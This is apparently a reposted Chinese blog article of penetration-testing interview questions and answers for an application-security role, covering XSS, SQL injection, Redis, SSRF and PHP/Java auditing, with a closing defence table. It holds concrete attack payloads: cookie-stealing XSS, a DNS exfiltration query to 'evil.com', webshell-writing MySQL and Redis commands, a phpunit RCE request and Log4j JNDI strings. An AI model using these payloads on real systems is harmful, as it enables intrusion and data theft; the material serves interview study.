2025年渗透测试面试题总结-攻防研究员(应用安全)(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 攻防研究员(应用安全)

一、基础部分

1. HTTP状态码对比

2. HTTP请求方法核心作用

3. 网络分层协议速查表

二、OWASP TOP 10攻防要点

1. XSS代码执行原理

2. XSS常用标签与Payload

3. HttpOnly防御机制

4. SQL注入快速检测

5. 无回显注入解决方案

6. MySQL延时注入替代技术

7. DNSLog原理图解

8. 单引号拦截绕过技术

9. MySQL写Shell高阶方法

10. Redis未授权写Shell

11. SSRF利用链与高危协议

PHP安全审计核心要点

1. 审计流程

2. 命令执行函数

3. 文件上传函数

4. 代码执行函数

5. vendor目录风险

6. phpunit漏洞利用

7. 无文件Shell实现

Java安全审计核心要点

1. 通用漏洞组合利用

2. 命令执行函数/包

3. 主流框架漏洞

4. 审计流程与专长

5. Tomcat回显技术

6. 内存马实现方式

防御关键点总结


 攻防研究员(应用安全)

# 基础
1. http状态码,502,503,501
2. http请求方式及各自作用
3. 计算机网络的分层及分别有哪些协议# owasp top 10
1. xss如何执行代码
2. xss常用哪些标签
3. http only
4. 怎样判断是否存在注入
5. sql注入无回显怎么办
6. 延时注入除了sleep的其他姿势(mysql)
7. dnslog的实现原理
8. sql注入,单引号被拦截,如何绕过
9. sql注入,写shell的语句,除了into outfile还有什么mysql的特性可以getshell
10.redis的利用,如何shell,相关命令
11.ssrf的原理即后利用,怎么执行命令,常搭配使用的协议# PHP安全相关
1. 审计流程
2. 命令执行函数
3. 文件上传函数
4. 代码执行函数
5. vender目录
6. phpunit
7. php可以构造无文件shell吗# Java安全相关
1. 挖过的通用洞,你会怎么利用(组合)
2. 命令的函数或包
3. java哪些框架,审过哪些框架,它们常出现的问题是什么
4. 审计流程,你一般关注哪些洞,或擅长挖哪种类型
5. tomcat做回显
6. 内存马的实现# 其他
- 写poc/exp的经历和心得
- 复现的一些漏洞
- Linux 提权的姿势
- Linux下有哪些文件进行渗透时比较关注的,及文件权限问题
- dirty cow 的时间及其修复版本(哪年后就没法用了)
- 你觉得什么是你自己比较擅长的而我没有问到的

一、基础部分

1. HTTP状态码对比
状态码含义触发场景
502Bad Gateway网关服务器收到上游无效响应
503Service Unavailable服务过载或维护中(临时不可用)
501Not Implemented服务器不支持请求方法(如PUT)

补充:502需检查反向代理配置,503常伴随Retry-After头部。

2. HTTP请求方法核心作用
方法主要功能关键特性
GET获取资源安全、幂等、可缓存
POST提交数据(创建/更新资源)非幂等、请求体传参
PUT替换整个资源幂等、需完整资源
DELETE删除指定资源幂等
PATCH局部更新资源非幂等

注:HEAD获取响应头,OPTIONS查询服务器支持的方法。

3. 网络分层协议速查表
分层核心协议
应用层HTTP/HTTPS, DNS, FTP, SMTP
传输层TCP(可靠传输), UDP(低延迟)
网络层IP, ICMP(ping), ARP(地址解析)
数据链路层Ethernet, PPP, MAC地址寻址
物理层光纤、双绞线(定义电气/物理特性)

二、OWASP TOP 10攻防要点

1. XSS代码执行原理

用户输入 → 未过滤嵌入HTML → 浏览器解析执行JS代码

 

html

复制

<!-- 反射型XSS示例 --> http://site.com?search=<script>**alert(document.cookie)**</script>

2. XSS常用标签与Payload
 

html

复制

<img src=x **onerror=alert(1)**> <!-- 事件触发 --> <svg **onload=alert(1)**> <!-- 矢量图形利用 --> <a href=**javascript:alert(1)**>XSS</a> <!-- JS伪协议 --> <iframe **src=javascript:alert(1)**> <!-- iframe嵌套 -->

3. HttpOnly防御机制
  • 作用:设置Set-Cookie: sessionID=xxx; **HttpOnly**
  • 效果:阻止JavaScript读取Cookie,缓解会话劫持
4. SQL注入快速检测
类型检测Payload预期结果
数字型id=1 **AND 1=1**id=1 **AND 1=2**页面内容变化
字符型id=' **'**数据库报错
布尔盲注id=1' **AND SLEEP(5)**--响应延迟5秒
5. 无回显注入解决方案
  • DNS外带数据(需出网):
     

    sql

    复制

    SELECT LOAD_FILE(CONCAT('\\\\',(**SELECT password**),'.evil.com\\a'))

  • 布尔盲注:二分法逐字符判断 SUBSTRING(password,1,1)='a'
6. MySQL延时注入替代技术
 

sql

复制

SELECT **BENCHMARK(10000000,SHA1('test'))**; /* CPU计算延时 */ SELECT **GET_LOCK('inject',5)**; /* 数据库锁竞争 */

7. DNSLog原理图解
 

mermaid

复制

graph LR A[目标服务器] -- 发起DNS查询 --> B(**恶意域名: data.attacker.com**) B --> C[DNS服务器] C --> D[攻击者查看日志] D --> E(获取“data”内容)

8. 单引号拦截绕过技术
  • 编码绕过CHAR(39) 代替 '(ASCII 39=单引号)
  • 宽字节注入%bf%27 → GBK编码吞并转义符\
  • 数字型注入:直接使用 id=1 避免引号
9. MySQL写Shell高阶方法
 

sql

复制

SET GLOBAL **general_log = 'ON'**; SET GLOBAL **general_log_file = '/var/www/shell.php'**; SELECT '<?php **system($_GET[cmd])**; ?>'; /* 日志写入Webshell */

10. Redis未授权写Shell
 

bash

复制

CONFIG SET **dir /var/www/html** # 设置Web目录 SET payload "<?php **system($_GET['cmd'])**;?>" CONFIG SET **dbfilename shell.php** # 保存为PHP SAVE # 持久化到磁盘

11. SSRF利用链与高危协议
协议利用场景命令执行示例
file://读取本地文件file:///etc/passwd
gopher://发送任意TCP请求构造Redis协议执行FLUSHALL
dict://探测内网端口dict://127.0.0.1:6379/info

PHP安全审计核心要点

1. 审计流程
mermaidgraph TD A[信息收集] --> B[入口点定位] B --> C{敏感函数追踪} C --> D[漏洞链构造] D --> E[PoC验证]
  • 信息收集composer.json 依赖分析、框架版本比对(如Laravel CVE-2021-3129 RCE)
  • 入口点$_GET/$_POSTfile_get_contents('php://input')$_COOKIE
  • 敏感函数追踪:全局搜索eval/system/unserialize
  • 漏洞链:如文件上传+路径穿越→本地文件包含→RCE
2. 命令执行函数
高危函数利用场景
system()直接执行系统命令
shell_exec()无回显命令执行(需输出劫持)
popen()管道形式执行命令
proc_open()多进程控制(可交互式Shell)
3. 文件上传函数
  • move_uploaded_file()
    绕过方案:%00截断(PHP<5.3)、/.目录穿越(Linux)
  • file_put_contents()
    风险:<?php标签直接写入Web目录 → Webshell
4. 代码执行函数
函数触发方式
eval()直接执行字符串代码
assert()断言语句执行PHP代码
preg_replace(/e)修饰符e导致代码执行
call_user_func()回调函数执行系统命令
5. vendor目录风险
  • 依赖包漏洞:如phpmailer/phpmailer < 6.5.3 (CVE-2021-3603 RCE)
  • 利用方式
    1. 查找已知漏洞组件版本(composer.lock
    2. 触发漏洞链(如反序列化+POP链)
6. phpunit漏洞利用
  • 未授权RCE:暴露/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Payload
    httpPOST /eval-stdin.php HTTP/1.1 Body: <?php system("id"); ?>
7. 无文件Shell实现
技术原理
内存驻留通过php-fpm未授权访问执行代码
反序列化链利用Monolog/Guzzle库的__destruct触发
OpCache覆盖篡改缓存文件(需条件:文件可写+已知路径)

Java安全审计核心要点

1. 通用漏洞组合利用
mermaidgraph LR A[Fastjson反序列化] --> B[JNDI注入] B --> C[LDAP恶意类加载] C --> D[远程代码执行]
  • 经典组合
    • Shiro RememberMe + 硬编码密钥 → AES反序列化RCE
    • Log4j2 + ${jndi:ldap://} → 远程类加载
2. 命令执行函数/包
类/方法所属包
Runtime.getRuntime().exec()java.lang
ProcessBuilder.start()java.lang
GroovyShell.evaluate()org.codehaus.groovy
3. 主流框架漏洞
框架常见漏洞类型案例
SpringSpEL表达式注入CVE-2022-22963(Cloud RCE)
Struts2OGNL表达式执行S2-045(RCE via Content-Type)
Shiro权限绕过/反序列化CVE-2020-1957(路径绕过)
4. 审计流程与专长
  • 核心关注点
    1. 反序列化入口(readObject()、JSON/XML解析)
    2. 表达式注入(OGNL、SpEL、EL)
    3. 权限校验缺失(Shiro注解绕过)
  • 专长方向
    • Java反序列化链:构造CC链、Tomcat链攻击
    • 内存马注入:无文件持久化攻击
5. Tomcat回显技术
  • 写入响应流
    javaWebappClassLoader loader = (WebappClassLoader) Thread.currentThread().getContextClassLoader(); ServletContext context = loader.getServletContext(); HttpServletResponse response = (HttpServletResponse) context.getResponse(); response.getWriter().write(" 命令结果");
6. 内存马实现方式
类型注入点持久化方式
Servlet型addServlet()动态注册恶意Servlet
Filter型addFilter()拦截所有请求
Agent型Instrumentation字节码修改(无文件)

防御关键点总结表

风险类型PHP防御方案Java防御方案
命令执行disable_functions禁用高危函数SecurityManager限制执行权限
文件上传MIME检测+随机文件名文件头校验+独立存储域
反序列化避免unserialize用户输入使用SafeObjectInputStream
无文件攻击禁用php-fpm未授权访问JVM参数禁止远程类加载

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/web/84808.shtml
繁体地址,请注明出处:http://hk.pswp.cn/web/84808.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SpringBoot新闻项目学习day3--后台权限的增删改查以及权限管理分配

新增管理员修改管理员删除管理员登录 新增管理员 1.点击新增按钮打开一个对话框 2.确定新增对话框要显示哪些内容 3.提交 4.后端处理、保存 5.响应前端 vue代码 <template><!-- 新增代码内容是比较多的,建议抽取出来,定义到一个独立的vue文件中在列表组件中导入…

算法导论第二十五章 深度学习的伦理与社会影响

第二十五章 深度学习的伦理与社会影响 技术的光芒不应掩盖伦理的阴影 随着深度学习技术在各领域的广泛应用&#xff0c;其引发的伦理和社会问题日益凸显。本章将深入探讨这些挑战&#xff0c;并提供技术解决方案和最佳实践&#xff0c;引导读者构建负责任的人工智能系统。 25.…

Linux中ansible模块补充和playbook讲解

一、模块使用 1.1 Yum模块 功能&#xff1a;管理软件包&#xff0c;只支持RHEL&#xff0c;CentOS&#xff0c;fedora&#xff0c;不支持Ubuntu其它版本 参数说明name要操作的软件包名称&#xff0c;支持通配符&#xff08;如 httpd, nginx*&#xff09;&#xff0c;也可以是…

唐代大模型:智能重构下的盛世文明图谱

引言&#xff1a;当长安城遇见深度学习 一件唐代鎏金舞马衔杯银壶的虚拟复原品正通过全息投影技术演绎盛唐乐舞。这个跨越时空的场景&#xff0c;恰似唐代大模型技术的隐喻——以人工智能为纽带&#xff0c;连接起长安城的盛世气象与数字时代的文明重构。作为人工智能与历史学…

国产ARM/RISCV与OpenHarmony物联网项目(三)网关设备控制

一、设备控制界面与功能设计 程序界面运行与设计效果如下: 设备控制相关程序调用关系图如下&#xff1a; 其中device_control.html程序为网页界面显示程序&#xff0c;led_alarm.cgi程序为光线数据的报警超限数据设置与管理&#xff0c;led_control.cgi程序功能为对Led灯的开…

微信小程序反编译实战教程

在实际渗透测试或安全分析中&#xff0c;经常会遇到微信小程序中的签名加密&#xff08;sign&#xff09;机制&#xff0c;这些机制大多具备防重放、防篡改的特性&#xff0c;导致我们在抓包时难以直接复现请求。 &#x1f50d; 另一方面&#xff0c;一些小程序的代码中往往会…

【NLP入门系列三】NLP文本嵌入(以Embedding和EmbeddingBag为例)

&#x1f368; 本文为&#x1f517;365天深度学习训练营 中的学习记录博客&#x1f356; 原作者&#xff1a;K同学啊 博主简介&#xff1a;努力学习的22级本科生一枚 &#x1f31f;​&#xff1b;探索AI算法&#xff0c;C&#xff0c;go语言的世界&#xff1b;在迷茫中寻找光芒…

文心一言(ERNIE Bot):百度打造的知识增强大语言模型

1. 产品概述 文心一言&#xff08;ERNIE Bot&#xff09;是百度自主研发的知识增强大语言模型&#xff0c;于2023年3月16日正式发布&#xff0c;对标OpenAI的ChatGPT&#xff0c;具备文本生成、多模态交互、逻辑推理、中文理解等能力。该模型基于百度的飞桨深度学习平台和文心…

Java-49 深入浅出 Tomcat 手写 Tomcat 实现【02】HttpServlet Request RequestProcessor

点一下关注吧&#xff01;&#xff01;&#xff01;非常感谢&#xff01;&#xff01;持续更新&#xff01;&#xff01;&#xff01; &#x1f680; AI篇持续更新中&#xff01;&#xff08;长期更新&#xff09; 目前2025年06月13日更新到&#xff1a; AI炼丹日志-28 - Aud…

在VB.net中,文本插入的几个自定义函数

一、如果你是高手&#xff0c;一定“识货”&#xff0c;分享给你 二、可应用于文本插入的几种方式&#xff1a;6种 三、需要用到以下的几个函数&#xff1a; 上代码&#xff1a; Module TextModule <summary> 在指定位置插入文本 </summary> <p…

QC -io 服务器排查报错方式/报错: Failed to convert string to integer of varId variable!“

进断点控制台有报错之后&#xff0c;复制报错信息到 头部菜单栏 1.编辑 -> 2.Find/Replace ->3.Advanced Find ->4. Project“xxxxx” 能找到问题点 再分析定位 在排查报错时候&#xff0c;进入了这个报错&#xff0c;msgInfo "MyTcpRedis: Failed to conver…

c++中auto与decltype使用

在 C11及后续版本中&#xff0c;关键字auto和decltype都是用于类型推导的&#xff0c;但它们的使用场景和行为有所不同。 1. auto 关键字 作用 auto 用于自动推导变量的类型&#xff0c;由编译器根据初始化表达式来确定。 常见用法 // 基本用法 auto x 42; // int…

LabVIEW机器视觉零件检测

基于LabVIEW 图形化编程平台与机器视觉技术&#xff0c;构建集图像采集、处理、尺寸计算与合格性分析于一体的自动化检测方案。通过模块化硬件架构与自适应算法设计&#xff0c;实现对机械零件多维度尺寸的非接触式高精度测量&#xff0c;相比人工检测效率提升 12 倍&#xff0…

大数据治理域——实时数据开发

摘要 本文深入探讨了大数据治理域中的实时数据开发&#xff0c;重点介绍了流式数据处理的核心价值、特点、技术挑战、典型能力和应用场景。同时&#xff0c;详细阐述了流式技术架构&#xff0c;包括数据采集、处理、存储和服务等环节&#xff0c;并针对大促场景提出了相应的技…

Halcon/C# 图像窗口、读取图片及仿射变换

一、Halcon 清理窗口 清除图像窗口的显示。 dev_clear_window() 二、Halcon 读取图片 (一) 读取一张图片 read_image (Image, printer_chip/printer_chip_01)Image&#xff1a;&#xff08;输出参数&#xff09;读取到的图片变量名 第二个参数&#xff1a;图片路径&#xf…

Nginx 反向代理服务和安装docker-compose

Nginx 反向代理服务和安装docker-compose Nginx Proxy Manager 他是一个可视化的nginx的反向代理神器&#xff0c;动动手指轻松的配置Nginx&#xff0c;我们可以通过一些网页&#xff0c;即可完成网站的代理配置&#xff0c;无需在动手安装Nginx&#xff1b; dockoer-compose部…

FPGA基础 -- Verilog 锁存器简介

由浅入深地讲解 Verilog 中的锁存器&#xff08;Latch&#xff09;**&#xff0c;包括&#xff1a; 什么是锁存器&#xff08;定义与作用&#xff09;锁存器的分类&#xff08;透明锁存器 vs 边沿触发器&#xff09;Verilog 中锁存器的建模方式锁存器与触发器的区别锁存器的时…

Eclipse Memory Analyzer (MAT) 相关配置调整

一、JDK版本过低提示 已安装高于 jdk 17 的版本依旧提示 jdk 版本过低&#xff0c;打开MAT的安装目录&#xff0c;在配置文件 MemoryAnalyzer.ini 中添加配置指向JDK即可。新增两行配置&#xff1a; -vm D:/jdk_21.0.7/bin/javaw.exe //jdk安装路径 bin 目录下的javaw.exe二…

机器学习常用评估指标

机器学习常用评估指标 机器学习的评价指标有精度、精确率、召回率、P-R曲线、F1 值、TPR、FPR、ROC等指标&#xff0c;还有在生物领域常用的敏感性、特异性等指标。 基础 在分类任务中&#xff0c;各指标的计算基础都来自于对正负样本的分类结果&#xff0c;用混淆矩阵表示&…

视频相似度检测算法(带课设报告)

摘 要 本文提出了一种基于关键帧特征提取的视频相似度检测方法&#xff0c;通过融合自适应采样与特征降维技术实现高效准确的视频内容比对。系统采用三阶段处理流程&#xff1a;首先对输入视频进行自适应关键帧采样&#xff0c;通过均匀间隔算法提取固定数量&#xff08;默…